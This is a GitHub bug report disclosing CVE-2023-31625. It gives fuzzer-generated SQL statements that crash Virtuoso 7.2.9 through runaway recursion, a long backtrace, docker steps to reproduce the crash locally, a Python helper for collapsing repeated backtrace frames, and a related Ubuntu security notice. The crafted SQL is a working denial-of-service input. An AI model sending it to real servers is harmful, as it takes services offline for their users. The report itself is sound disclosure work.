CVE-2023-31625: virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118) · Issue #1132 · openlink/virtuoso-opensource

An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.

The PoC is generated by my DBMS fuzzer.

CREATE TABLE t1 ( x LONG VARCHAR, a INTEGER DEFAULT 0, b LONG VARCHAR, t2 LONG VARCHAR );
CREATE VIEW t1 AS SELECT * FROM t1;
INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null', '', repeat('1234567890',50000));

backtrace:

#0 0x7f421a573900 (psiginfo+0x134a0)
#1 0x7f421a588f9a (vscanf+0x14a)
#2 0x7f421a55edf6 (__snprintf+0x96)
#3 0x5a2227 (sch_full_proc_name_1+0x2c7)
#4 0x7879a3 (sinv_find_func_map+0x143)
#5 0x788fb7 (sinv_check_exp+0x317)
#6 0x78a03d (sinv_sqlo_check_col_val+0xad)
#7 0x816d50 (sqlc_insert_view+0x330)
#8 0x81721d (sqlc_insert_view+0x7fd)
#9 0x81721d (sqlc_insert_view+0x7fd)
#10 0x81721d (sqlc_insert_view+0x7fd)
#11 0x81721d (sqlc_insert_view+0x7fd)
#12 0x81721d (sqlc_insert_view+0x7fd)
#13 0x81721d (sqlc_insert_view+0x7fd)
…
#5714 0x81721d (sqlc_insert_view+0x7fd)
#5715 0x81721d (sqlc_insert_view+0x7fd)
#5716 0x81721d (sqlc_insert_view+0x7fd)
#5717 0x6b7387 (sql_stmt_comp+0x987)
#5718 0x6ba122 (sql_compile_1+0x1a62)
#5719 0x7c8cd0 (stmt_set_query+0x340)
#5720 0x7cabc2 (sf_sql_execute+0x922)
#5721 0x7cbf4e (sf_sql_execute_w+0x17e)
#5722 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#5723 0xe1f01c (future_wrapper+0x3fc)
#5724 0xe2691e (_thread_boot+0x11e)
#5725 0x7f421a84c609 (start_thread+0xd9)
#5726 0x7f421a61c133 (clone+0x43)

ways to reproduce (write the PoC to the file '/tmp/test.sql' first):

remove the old one

docker container rm virtdb_test -f

start virtuoso through docker

docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9

wait for the server to start

sleep 10

check whether the simple query works

echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba

run the poc

docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
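
A triage helper for backtraces in the format quoted above, added here as an example (it is not part of the original issue or of Virtuoso): it collapses adjacent identical frames so that a run such as the repeated sqlc_insert_view+0x7fd frames shows up as one entry with its depth. The function names, the min_depth threshold and the treatment of elided frames as repeats of their neighbours are assumptions of this example; SAMPLE is an excerpt of the page's backtrace.

```python
import re
from itertools import groupby

# Frame format in the backtrace above: "#<index> 0x<address> (<symbol>+0x<offset>)"
FRAME_RE = re.compile(r"#(\d+)\s+0x[0-9a-fA-F]+\s+\((\w+)\+0x([0-9a-fA-F]+)\)")

# Excerpt of the backtrace quoted in the issue; "..." marks its elided frames.
SAMPLE = """\
#6 0x78a03d (sinv_sqlo_check_col_val+0xad)
#7 0x816d50 (sqlc_insert_view+0x330)
#8 0x81721d (sqlc_insert_view+0x7fd)
#9 0x81721d (sqlc_insert_view+0x7fd)
...
#5715 0x81721d (sqlc_insert_view+0x7fd)
#5716 0x81721d (sqlc_insert_view+0x7fd)
#5717 0x6b7387 (sql_stmt_comp+0x987)
"""

def parse_frames(text):
    """Return (index, symbol, offset) for every frame found in text."""
    return [(int(i), sym, int(off, 16)) for i, sym, off in FRAME_RE.findall(text)]

def collapse_runs(frames):
    """Merge adjacent frames that share symbol+offset into one run.

    Depth comes from the frame indices, so frames hidden behind an elision are
    counted too (assumption: they repeat the frames on either side of it).
    """
    runs = []
    for (sym, off), group in groupby(frames, key=lambda f: (f[1], f[2])):
        idx = [f[0] for f in group]
        runs.append({"symbol": sym, "offset": off, "first": idx[0],
                     "last": idx[-1], "depth": idx[-1] - idx[0] + 1})
    return runs

def recursion_suspects(text, min_depth=100):
    """Runs deep enough to suggest unbounded recursion (threshold is arbitrary)."""
    return [r for r in collapse_runs(parse_frames(text)) if r["depth"] >= min_depth]

if __name__ == "__main__":
    for r in recursion_suspects(SAMPLE):
        print(f'{r["symbol"]}+{r["offset"]:#x}: '
              f'frames #{r["first"]}-#{r["last"]} ({r["depth"]} deep)')
```

Grouping on symbol plus offset keeps frame #7 (sqlc_insert_view+0x330, the initial call) separate from the repeated return site at +0x7fd.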

Related news

Ubuntu Security Notice USN-6832-1

Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.
